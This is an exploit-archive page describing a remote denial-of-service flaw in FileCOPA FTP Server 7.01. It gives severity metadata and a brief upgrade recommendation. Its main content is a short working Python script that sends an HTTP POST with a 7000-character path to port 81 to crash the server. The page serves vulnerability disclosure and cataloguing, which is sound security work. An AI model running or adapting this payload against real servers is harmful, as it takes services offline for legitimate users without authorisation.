header-logo
Suggest Exploit
vendor:
FileCOPA FTP Server
by:
Chako
7,5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: FileCOPA FTP Server
Affected Version From: 7.01
Affected Version To: 7.01
Patch Exists: Yes
Related CWE: N/A
CPE: a:intervations:filecopa_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013

FileCOPA FTP Server Remote Denial-of-Service Vulnerability

FileCOPA FTP Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. FileCOPA FTP Server 7.01 is vulnerable; other versions may also be affected.

Mitigation:

Upgrade to the latest version of FileCOPA FTP Server
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/60909/info

FileCOPA FTP Server is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

FileCOPA FTP Server 7.01 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import socket
import sys


PAYLOAD = "\x41" * 7000


print("\n\n[+] FileCOPA V7.01 HTTP POST Denial Of Service")
print("[+] Version: V7.01")
print("[+] Chako\n\n\n")

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('www.example.com',81))

s.send("POST /" + PAYLOAD + "/ HTTP/1.0\r\n\r\n")


s.close()
print("[!] Done! Exploit successfully sent\n")